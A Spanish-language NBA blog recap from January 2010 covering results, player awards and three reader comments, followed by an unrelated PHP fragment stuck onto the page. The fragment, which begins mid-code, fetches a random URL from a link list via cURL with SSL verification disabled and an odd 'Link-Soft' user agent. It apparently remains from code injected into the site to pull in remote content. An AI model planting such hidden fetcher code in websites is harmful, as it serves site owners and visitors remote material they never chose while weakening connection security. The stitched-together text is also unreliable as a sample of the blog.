La Crónica (16/01/2010)

17 de January de 2010 por TheDeerHunter

Por segunda noche consecutiva pusieron a los Cavs en jaque. Por segunda vez LeBron se echó el equipo a la espalda anotando 13 puntos en el último cuarto pero, al contrario que la noche anterior, la canasta ganadora del rival sobre la bocina esta vez no entró. Hasta ese momento, Eric Gordon y Rasual Butler habían anotado casi con comodidad, pero la bola decisiva fue para Baron Davis que había tenido hasta el momento una noche muy desacertada. No fue una buena idea. Los Clippers se están quedando cortados del pelotón de postemporada.

Y es que el resto de implicados en ese pelotón del oeste anoche se mostraron implacables. Todos, excepto los Suns que se están metiendo en problemas. Ayer fueron apalizados salvajemente en Charlotte, en la noche que Stephen Jackson alcanzó los 10.000 puntos. Noche aciaga para Nash, Richardson y Grant Hill, entre otros. Los Jazz están a punto de cogerles con su victoria de anoche contra los Bucks… aunque Sundiata Gaines volviera a su cotidiano anonimato jugando tan sólo un minuto.

Son los Grizzlies quienes encabezan el grupo perseguidor. Ayer marcaron mejor racha histórica de la franquicia en casa tumbando a los Spurs. Espectacular la pareja Zach Randolph-Mayo. Los Thunder, de la mano cómo no de Durant, pasaron por encima de los Heat y los Hornets ganaron en Indiana a pesar del espectacular partido de Hibbert.

Por último, los Wizards le dieron la 600ª victoria a Flip Saunders frente a los Kings y los Pistons ganaron a los Knicks.

PREMIOS

MVP: Ex-aquo para Gerald Wallace y Stephen Jackson, artífices principales de la paliza que los Bobcats le endosaron a los Suns. Ambos anotaron 29 puntos (en un excelente 22 de 32, combinados) y el primero lo complementó con 13 rebotes y el segundo con 5 rebotes, 8 asistencias y 5 robos.

Rookie: Tyreke Evans continúa adaptándose al cambio que supone jugar junto a Kevin Martin. Anoche pese a conseguir 21 puntos, 6 rebotes y 7 asistencias, los Kings volvieron a caer. Veremos movimientos, sin duda.

Sorpresa: Partidazo de Roy Hibbert, 27 puntos y 10 rebotes. En cuanto consiga ser un poco más regular disfrutaremos de pívot durante años.

Decepción: Tristísimo de los Spurs y en espacial de Tony Parker. 4 puntitos, 2 rebotes y 3 asistencias en 30 minutos de juego. Los Grizzlies le pasaron por encima.

Esfuerzo en vano: 26 puntos, 17 rebotes y 9 asistencias. Otra brutal actuación más de David Lee. Lástima que no fueran suficientes para llevarse la victoria.

Comenta

3 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Digo yo que si los Bobcats llegan a febrero bien colocados, Wallace o Jackson tendran que ser All-Star….o los dos.

      Citar

  2. Toni dice:
    #2

    Una pregunta, ¿David Lee acaba contrato en verano de 2010 verdad? (firmó unicamente un año más) Creo que puede ser una segunda espada de perfecta para algun equipo con una estrella emergente como Durant.

    Estos Grizzlies empiezan a asustar…

      Citar

  3. sergio dice:
    #3

    No me gustara nada Larry Brown pero desde luego esta haciendo un grandisimo trabajo con la plantilla que tiene. He leido que, a pesar de los mas de 1900 partidos dirigidos por Brown, esta es la segunda vez en toda su vida en el que un equipo suyo hace mas de un +20 en un cuarto respecto a su adversario. Muestra clara de basket control.

    Los Grizzlies si que asustan si, pero aun no han entrado en Playoffs. Lo mas triste es que serian 5º en el Este. De hecho solo 4 equipos del Oeste no estarian Playoffs en el Este ahora mismo (Minnesota, Golden State, Sacramento y Clippers)

    El partidito de David Lee tiene guasa… creo que desde la temporada dorada de Garnett no veia un partido tan completo de nadie. Creo que si que le queda un año, pero me extrañaria que lo dejasen marchar siendo pieza fundamental del equipo y con las perspectivas de futuro de la franquicia de cara al año que viene.

    Hoy se me ha ocurrido pensar en un Kevin Martin – Al Jefferson. Solo hay dos millones de diferencia entre ambos jugadores y los dos equipos recibirian piezas necesarias para sus equipos.

    He estado observando que Miami el año proximo libera ¡¡23 millones!! por Jermaine O’neal. Menos a Kobe y McGrady podrian tener al jugador que quisieran en su plantilla por ese precio

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>